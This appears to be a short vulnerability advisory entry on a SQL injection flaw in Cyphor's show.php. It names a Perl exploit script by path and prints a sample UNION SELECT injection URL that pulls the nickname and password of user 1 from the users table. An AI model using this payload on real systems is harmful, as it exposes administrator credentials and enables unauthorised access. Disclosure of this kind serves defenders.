• info
• discussion
• exploit
• solution
• references

Cyphor Show.PHP SQL Injection Vulnerability

A PERL script that attempts to output administrative account details, such as login and password, has been made available in the exploit section.

Sample SQL injection code has been provided:
show.php?fid=2&id=-10%20union%20select%20id,null,null,null,null,nick,
password,null,null,null%20from%20users%20where%20id=1

• /data/vulnerabilities/exploits/cyphor_sql.pl